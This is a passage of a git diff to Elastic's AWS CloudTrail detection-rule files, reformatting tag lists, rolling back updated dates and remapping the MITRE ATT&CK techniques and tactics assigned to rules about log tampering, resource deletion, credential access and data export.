"2026/01/21" [rule] author = ["Elastic"] @@ -83,21 +83,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml index 166538416bc..3dedaf38d39 100644 --- a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml +++ b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/15" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -130,21 +130,27 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml index 5e84d659e4b..8d37020dce8 100644 --- a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml +++ b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/26" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -129,21 +129,27 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml index 941c9de02dd..41c5766b582 100644 --- a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml +++ b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/16" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -109,21 +109,27 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml index 2543f7add08..67bc1c4472a 100644 --- a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml +++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -95,7 +95,14 @@ references = [ risk_score = 73 rule_id = "e9fe3645-f588-43d6-99f5-437b3ef56f25" severity = "high" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -109,34 +116,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml index 9c3dc41b044..5c526fa7a83 100644 --- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml +++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Austin Songer", "Elastic"] @@ -131,7 +131,15 @@ references = [ risk_score = 47 rule_id = "bf1073bf-ce26-4607-b405-ba1ed8e9e204" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Use Case: Asset Visibility", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -145,34 +153,27 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" - [[rule.threat.technique.subtechnique]] id = "T1578.002" name = "Create Cloud Instance" reference = "https://attack.mitre.org/techniques/T1578/002/" +[[rule.threat.technique.subtechnique]] +id = "T1578.004" +name = "Revert Cloud Instance" +reference = "https://attack.mitre.org/techniques/T1578/004/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml index 121aa4b0ea2..a3f2352b5a1 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/27" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -122,29 +122,39 @@ event.dataset:aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml index d9ffd7ed065..d7bf8608f45 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/12" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -118,7 +118,15 @@ references = [ risk_score = 21 rule_id = "ff320c56-f8fa-11ee-8c44-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon S3", + "Use Case: Asset Visibility", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -132,21 +140,44 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [[rule.threat.technique.subtechnique]] id = "T1485.001" name = "Lifecycle-Triggered Deletion" reference = "https://attack.mitre.org/techniques/T1485/001/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml index 1ae94df10c8..d441f9f41fd 100644 --- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml +++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/08" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -76,7 +76,16 @@ references = [ risk_score = 47 rule_id = "bab88bb8-cdd9-11ef-bd9a-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SQS", "Use Case: Threat Detection", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SQS", + "Use Case: Threat Detection", + "Use Case: Log Auditing", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -90,16 +99,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml index 4ae04aa84e1..ff639694edb 100644 --- a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml +++ b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/19" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -23,7 +23,16 @@ references = [ risk_score = 47 rule_id = "7a5cc9a8-5ea3-11ef-beec-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Amazon Web Services", "Data Source: AWS", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Amazon Web Services", + "Data Source: AWS", + "Data Source: AWS STS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -81,21 +90,37 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.arn"] diff --git a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml index 1865f4c799b..07be3b05e01 100644 --- a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml +++ b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/14" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/16" [rule] author = ["Elastic"] @@ -116,16 +116,34 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.flattened.request_parameters.instanceId"] diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml index 357105f5229..197e4fc57fc 100644 --- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml +++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -91,7 +91,16 @@ references = [ risk_score = 47 rule_id = "ea248a02-bc47-4043-8e94-2885b19b2636" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Discovery", + "Tactic: Credential Access", +] timestamp_override = "event.ingested" type = "threshold" @@ -106,21 +115,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.threshold] field = ["cloud.account.id", "user.name", "source.ip"] value = 25 diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml index 1653177f8bc..1998dca1376 100644 --- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml +++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [rule] author = ["Elastic"] @@ -124,11 +124,10 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1538" +name = "Cloud Service Dashboard" +reference = "https://attack.mitre.org/techniques/T1538/" [[rule.threat.technique]] id = "T1580" @@ -139,6 +138,7 @@ reference = "https://attack.mitre.org/techniques/T1580/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml index 01217202d6c..f410c0aad7a 100644 --- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml +++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ references = [ risk_score = 21 rule_id = "7d091a76-0737-11ef-8469-f661ea17fbcc" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Lambda", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -99,34 +107,17 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml index 17dfd9e37dd..7164fa9a520 100644 --- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml +++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/25" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -98,14 +98,14 @@ field_names = [ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1651" -name = "Cloud Administration Command" -reference = "https://attack.mitre.org/techniques/T1651/" - +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml index 4746bdbd03c..d54fc7697a2 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/08" [rule] author = ["Elastic"] @@ -60,7 +60,15 @@ risk_score = 21 rule_id = "96b2a03e-003b-11f0-8541-f661ea17fbcd" setup = "DynamoDB data events must be enabled in CloudTrail to capture the Scan action. Ensure that the AWS CloudTrail service is configured to log data events for DynamoDB tables." severity = "low" -tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS DynamoDB", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS DynamoDB", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Exfiltration", +] timestamp_override = "event.ingested" type = "new_terms" @@ -74,16 +82,29 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml index d6187d0130b..0934b06a3a4 100644 --- a/rules/integrations/aws/exfiltration_ec2_export_task.toml +++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -77,7 +77,16 @@ references = [ risk_score = 47 rule_id = "deee5856-25ba-438d-ae53-09d66f41b127" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Asset Visibility", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -91,21 +100,39 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[[rule.threat.technique]] +id = "T1119" +name = "Automated Collection" +reference = "https://attack.mitre.org/techniques/T1119/" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml index c0fa1715988..a0aa65612d3 100644 --- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml +++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic", "Austin Songer"] @@ -99,7 +99,16 @@ references = [ risk_score = 47 rule_id = "c1812764-0788-470f-8e74-eb4a14d47573" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -113,16 +122,46 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml index 42239c6cd28..a0ba6578562 100644 --- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml +++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/06" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date 